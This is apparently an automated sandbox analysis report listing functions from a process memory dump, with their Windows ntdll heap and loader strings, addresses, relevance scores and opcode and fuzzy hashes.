                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      • API String ID: 0-258546922
                                                                                                                      • Opcode ID: 0f6ce1a0273b12fd71a950c7f5208a824ba055c3e2ab42d53cfbeea906556381
                                                                                                                      • Instruction ID: c3b982c7e4856aa7328b32e0d21a18f2d07169be1f076cea7818f2cbe5e66f32
                                                                                                                      • Opcode Fuzzy Hash: 0f6ce1a0273b12fd71a950c7f5208a824ba055c3e2ab42d53cfbeea906556381
                                                                                                                      • Instruction Fuzzy Hash: C4F14D72E14218EFCF15DFA4D984EAEBBF9FF48610F14445AE905A7250E7709E01EBA0
                                                                                                                      Function 0575D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1975516107
                                                                                                                      • Opcode ID: f89319debde0240823481e98f28e1e3dcd77298cacd86c9d374b0126580ad3eb
                                                                                                                      • Instruction ID: 6bcd10fb00477d47028cd5dd651927bbd18e0a88b44afbdd7e3cc1e17b51c419
                                                                                                                      • Opcode Fuzzy Hash: f89319debde0240823481e98f28e1e3dcd77298cacd86c9d374b0126580ad3eb
                                                                                                                      • Instruction Fuzzy Hash: 5551A271A043459FDB34DFA4D4897ADBFB2FB48324F148159DC026B281DBB4AA85EB90
                                                                                                                      Function 057276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      • API String ID: 0-3061284088
                                                                                                                      • Opcode ID: 2835611b419b0598be50f89a8f555bcc31970a19aab334537091da3426a737bb
                                                                                                                      • Instruction ID: 6ab41959f6197712913d3c0ad2c9e54f119c9afb785087aa65d40e10bc5a619d
                                                                                                                      • Opcode Fuzzy Hash: 2835611b419b0598be50f89a8f555bcc31970a19aab334537091da3426a737bb
                                                                                                                      • Instruction Fuzzy Hash: 9601FCB2254260DED329A718D40EF727BD4EB42B70F145059F059475A1CAF4AC84F560
                                                                                                                      Function 057470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: f8ff03cc0d03855a0b0c85c023308d9796ba7363af296716160f3f1f48060493
                                                                                                                      • Instruction ID: b43b752059b4af72ba189377c5f41bef7f68e318a03336bcd99608a17d2655ea
                                                                                                                      • Opcode Fuzzy Hash: f8ff03cc0d03855a0b0c85c023308d9796ba7363af296716160f3f1f48060493
                                                                                                                      • Instruction Fuzzy Hash: 6513B170A04659CFDB29CF68C494BA9FBF2FF49304F148169D84AAB381D734A942DF91
                                                                                                                      Function 05741070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3570731704
                                                                                                                      • Opcode ID: d36a12277a20b965a051c205a6009637a52247a1003b5802df1b3c1a0d6a4250
                                                                                                                      • Instruction ID: d79717e20ca94c98d4b02667041b112dfa91d526d3bde6f640562aaf31de0d14
                                                                                                                      • Opcode Fuzzy Hash: d36a12277a20b965a051c205a6009637a52247a1003b5802df1b3c1a0d6a4250
                                                                                                                      • Instruction Fuzzy Hash: C5926971A00269CFEB25DF18C884FA9B7B6BF45314F0581EAE949A7290D7309EC0DF61
                                                                                                                      Function 05768402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 05768591
                                                                                                                      • LdrpInitializeProcess, xrefs: 05768422
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05768421
                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0576855E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1918872054
                                                                                                                      • Opcode ID: a1ac51518f97f240f30c51ca19cb97e1b3d6718e4612c5e23283891cb30c3c2f
                                                                                                                      • Instruction ID: d6697f5c414d9cd09b16ffdf574ce7206946dda4a016b014c1317fd8e6495bce
                                                                                                                      • Opcode Fuzzy Hash: a1ac51518f97f240f30c51ca19cb97e1b3d6718e4612c5e23283891cb30c3c2f
                                                                                                                      • Instruction Fuzzy Hash: A7918BB1618344AFDB21DF21CC58FBBBAE8FB84754F40492EFA8496151E734D904EB62
                                                                                                                      Function 0576273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 057A21DE
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 057A22B6
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 057A21D9, 057A22B1
                                                                                                                      • .Local, xrefs: 057628D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: 594c44f30045ab1c8007c5f42fd715530707e2efc3a2ed148f5a4b8e4d02e632
                                                                                                                      • Instruction ID: 13882a57c087e5792efe274c280a507fe049a475e8b4b1cf350c96dbb7b5ec7f
                                                                                                                      • Opcode Fuzzy Hash: 594c44f30045ab1c8007c5f42fd715530707e2efc3a2ed148f5a4b8e4d02e632
                                                                                                                      • Instruction Fuzzy Hash: 16A1A239A05229DFCB64CF54CC88BA9B3B1BF98314F1541E9DC49A7292D7309E80EF90
                                                                                                                      Function 057364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 057910AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0579106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05791028
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05790FE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      • API String ID: 0-1468400865
                                                                                                                      • Opcode ID: f0cfb5f6eba4beab6bc404a46ad8864ac5855744e35188d41914a3b3562e3218
                                                                                                                      • Instruction ID: 072c6cf3efd8619435d55dd128a984ca5c77ce9540aed9c5cc0d7ac8a3785ba2
                                                                                                                      • Opcode Fuzzy Hash: f0cfb5f6eba4beab6bc404a46ad8864ac5855744e35188d41914a3b3562e3218
                                                                                                                      • Instruction Fuzzy Hash: 7D71B1B1A04305AFCB20DF15C889FAB7FA9AF44764F400468F9498B246D774D588EBE2
                                                                                                                      Function 0572F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      • API String ID: 0-2586055223
                                                                                                                      • Opcode ID: b1df0fd8d21d2cb9d96820530c87a60e8c0d2c5ea412cb2e2d08dbd471892e97
                                                                                                                      • Instruction ID: d25ba8fe8ea8da5f3d17cf105b799f0a01c1cfefddd3c9710eb6cc51c993540f
                                                                                                                      • Opcode Fuzzy Hash: b1df0fd8d21d2cb9d96820530c87a60e8c0d2c5ea412cb2e2d08dbd471892e97
                                                                                                                      • Instruction Fuzzy Hash: 2F61EE72344780AFD721EA28C849F76B7EAFF84710F044868F9998B291D734E945EB61
                                                                                                                      Function 057E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      • API String ID: 0-336120773
                                                                                                                      • Opcode ID: bea09efb2e93034612f4f72f2f78b739c65045c6d7a3fdb3618e9fa86ccb83f2
                                                                                                                      • Instruction ID: 24ba456a59acd8bca42ffbc556bbedef33e77ee9ecb301716044d0377d1a0c8c
                                                                                                                      • Opcode Fuzzy Hash: bea09efb2e93034612f4f72f2f78b739c65045c6d7a3fdb3618e9fa86ccb83f2
                                                                                                                      • Instruction Fuzzy Hash: CD31BAB1314220EFC711DB98CC8AF6A77E9FF08720F944055F446CB2A1EA70E840FA65
                                                                                                                      Function 0575245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 05752462
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0579A992
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0579A9A2
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0579A998
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-176724104
                                                                                                                      • Opcode ID: 44f152af20d067a17dffc987adb657dfbd697ef73ad38825bed22326a75b547d
                                                                                                                      • Instruction ID: 638aea363c76b2236bf3a34ec0212a2519042dc8e3cd7872da21ce2362ec45c0
                                                                                                                      • Opcode Fuzzy Hash: 44f152af20d067a17dffc987adb657dfbd697ef73ad38825bed22326a75b547d
                                                                                                                      • Instruction Fuzzy Hash: 57312571A10201ABDF359F59A84AE7E7FB6FB84720F254419FC01AB241DFB46981EB50
                                                                                                                      Function 05729148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      • API String ID: 0-1391187441
                                                                                                                      • Opcode ID: 5543b6582f08d6f83bbe1b5ff3a1a6a3fb12b9df31185957ca3d9666a77771c1
                                                                                                                      • Instruction ID: 94f432825aee7ab6aa76a798388638248649d085d9ac86d93b41a3f117943803
                                                                                                                      • Opcode Fuzzy Hash: 5543b6582f08d6f83bbe1b5ff3a1a6a3fb12b9df31185957ca3d9666a77771c1
                                                                                                                      • Instruction Fuzzy Hash: EE31F572610214EFCB01EB46C88CFAAB7F9FF44B20F144051E919A7291D770ED80FA61
                                                                                                                      Function 057D94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $0
                                                                                                                      • API String ID: 0-3352262554
                                                                                                                      • Opcode ID: 7a7bc2b6c7dc64bb55400c84440211e44ec4dc0de2bf5bb52a8f518647067ebb
                                                                                                                      • Instruction ID: 04f1932f7cc246f761f6df2689e77c01841d335ea41231cf00d0e6e238d0eb74
                                                                                                                      • Opcode Fuzzy Hash: 7a7bc2b6c7dc64bb55400c84440211e44ec4dc0de2bf5bb52a8f518647067ebb
                                                                                                                      • Instruction Fuzzy Hash: A13223B16083819FD360CF68C484B9BFBF5BB88344F04492EFA9987250D775E948DB62
                                                                                                                      Function 05740770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: 15e7ad8fa3d84248ebd8a47fde955480c3d365ec6932ab3eb1d70d177bcb04f7
                                                                                                                      • Instruction ID: 29a72b28298ee79694b8703579bad15e2f3c0f9ed385807fbdfa992742a1985b
                                                                                                                      • Opcode Fuzzy Hash: 15e7ad8fa3d84248ebd8a47fde955480c3d365ec6932ab3eb1d70d177bcb04f7
                                                                                                                      • Instruction Fuzzy Hash: 2FF17770700605DFDB2ACF68D898F6AB7B6FF45300F148168E5169B391D734A981EFA0
                                                                                                                      Function 05731460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 05731596
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05731728
                                                                                                                      • HEAP[%wZ]: , xrefs: 05731712
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: 13196f7b8e44ff529dccf0f2bc7c7460122ecbae340d2edfdcb4fe43509b3acf
                                                                                                                      • Instruction ID: dca449d1b1f38b0e43bd3e953d154c55f4d2b9b3ab0ba00d3b0a178ddc70eb4b
                                                                                                                      • Opcode Fuzzy Hash: 13196f7b8e44ff529dccf0f2bc7c7460122ecbae340d2edfdcb4fe43509b3acf
                                                                                                                      • Instruction Fuzzy Hash: E7E1E170A04645DFDB29CF68C456B7ABBF2BF44320F58846DE896CB246D734E940EB50
                                                                                                                      Function 0573B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                      • API String ID: 0-1145731471
                                                                                                                      • Opcode ID: 880b8d491def4966837a3c742256a0e735843a23633b8be046b7e5e0b4dffb1e
                                                                                                                      • Instruction ID: 5aa099d25b1f6d908b29cde1d4ed5a40924a9282e7aef43e2a1c9cba606ff9c9
                                                                                                                      • Opcode Fuzzy Hash: 880b8d491def4966837a3c742256a0e735843a23633b8be046b7e5e0b4dffb1e
                                                                                                                      • Instruction Fuzzy Hash: 92B19E75A086049FCF29CF69D985FADB7B6FF44324F144929E856EB281D730E840EB60
                                                                                                                      Function 057B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      • API String ID: 0-2391371766
                                                                                                                      • Opcode ID: 91b944f4df5c3dc281eea2cfe77d2b432e449ede0d51c8bfa179a3cf5e55a9cf
                                                                                                                      • Instruction ID: 82c9caaaeb9dc39fbb76f25cf487b335a8d451a939ead2dbb3d9f3c4961f7a73
                                                                                                                      • Opcode Fuzzy Hash: 91b944f4df5c3dc281eea2cfe77d2b432e449ede0d51c8bfa179a3cf5e55a9cf
                                                                                                                      • Instruction Fuzzy Hash: F5B1F7B1608345AFE721DF54C889FA7BBE8FB44714F114C29F9519B250DBB0E884EB92
                                                                                                                      Function 0572A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: fbe736793525eebca2c5679e42ce5d72c350894ed1dd776fe8a5bf7d1ef42888
                                                                                                                      • Instruction ID: 176b30746ebafe99800d2942aac127ba8359b3e4719e8d46619c3282763a72c5
                                                                                                                      • Opcode Fuzzy Hash: fbe736793525eebca2c5679e42ce5d72c350894ed1dd776fe8a5bf7d1ef42888
                                                                                                                      • Instruction Fuzzy Hash: EDA17C719416299BDB32EF24CC88BAAB7B8FF44710F1001E9E909AB250D7359EC5EF50
                                                                                                                      Function 057C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      • API String ID: 0-318774311
                                                                                                                      • Opcode ID: cc15924a47879e089d8f1663e12c84323ac691f1616bbbbe1d9482ea9e3fc2be
                                                                                                                      • Instruction ID: 8a3d2a30f240f06c2f43826c574333d7eb0857fc5382582900842fb8d2cf0b5b
                                                                                                                      • Opcode Fuzzy Hash: cc15924a47879e089d8f1663e12c84323ac691f1616bbbbe1d9482ea9e3fc2be
                                                                                                                      • Instruction Fuzzy Hash: 688199B1608340AFE311DB14C888B6ABBE9FF84754F048DADF9959B390D774D904EB62
                                                                                                                      Function 0573B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                      • API String ID: 0-373624363
                                                                                                                      • Opcode ID: 275d14969e60f1a4e247a5ec70ef3931da6aa2fbfb990a4328a5a63e98f7eb02
                                                                                                                      • Instruction ID: db1d4326f3e0ab045ef4bfcf8ede0ed7f933b1556d1c7c9fc07acf668464ac77
                                                                                                                      • Opcode Fuzzy Hash: 275d14969e60f1a4e247a5ec70ef3931da6aa2fbfb990a4328a5a63e98f7eb02
                                                                                                                      • Instruction Fuzzy Hash: 02910371A08209CFDF25CF58D485BEE77B1FF04324F144595E85AAB292D3789A80EFA1
                                                                                                                      Function 0576909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      • API String ID: 0-1537733988
                                                                                                                      • Opcode ID: bdf67cd82c101505c4cba60a16960fcccc1219401c8db4d4f6278e92decb837b
                                                                                                                      • Instruction ID: 2384013a6c80455fdaed3df5703125393f8ddceaa3ec2d16521bc4483a3723b6
                                                                                                                      • Opcode Fuzzy Hash: bdf67cd82c101505c4cba60a16960fcccc1219401c8db4d4f6278e92decb837b
                                                                                                                      • Instruction Fuzzy Hash: 2171C2716093429FDB14DF20C588E2BBBE6BFC4718F104A1DFA9697250D730D805EB52
                                                                                                                      Function 0580B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • TargetNtPath, xrefs: 0580B82F
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0580B82A
                                                                                                                      • GlobalizationUserSettings, xrefs: 0580B834
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      • API String ID: 0-505981995
                                                                                                                      • Opcode ID: ce35104f950cb31948f3a97eb32b31ea90b2166a459ca944a7120227ade34b7c
                                                                                                                      • Instruction ID: 516df395c53ea1cab4133b062712b3b4d40182acf241da5fb1a84cfbf1083102
                                                                                                                      • Opcode Fuzzy Hash: ce35104f950cb31948f3a97eb32b31ea90b2166a459ca944a7120227ade34b7c
                                                                                                                      • Instruction Fuzzy Hash: D8617072A41229ABDB71DF54DC8CBADB7B8AF04711F0101E5A909E7290DB749E80DF90
                                                                                                                      Function 0572F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0578E6C6
                                                                                                                      • HEAP: , xrefs: 0578E6B3
                                                                                                                      • HEAP[%wZ]: , xrefs: 0578E6A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      • API String ID: 0-1340214556
                                                                                                                      • Opcode ID: 413093636d3c10fb5d7eb0e8932272d06a232e7516a8b455d93e6395d41c7d02
                                                                                                                      • Instruction ID: 0c73dc9422de24609c2cbf8c94e84a44c7e28a7650b7c6ea9d4cc2c7515fec4e
                                                                                                                      • Opcode Fuzzy Hash: 413093636d3c10fb5d7eb0e8932272d06a232e7516a8b455d93e6395d41c7d02
                                                                                                                      • Instruction Fuzzy Hash: F851F671744654EFD712EB68C889FAABBF9FF05300F0400A5E9858B692D774E980EB10
                                                                                                                      Function 057515F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpCompleteMapModule, xrefs: 0579A590
                                                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0579A589
                                                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0579A59A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                      • API String ID: 0-1676968949
                                                                                                                      • Opcode ID: 167e6574566378636928be43c52898f15ba972f09d4e4945f129f8bf27629547
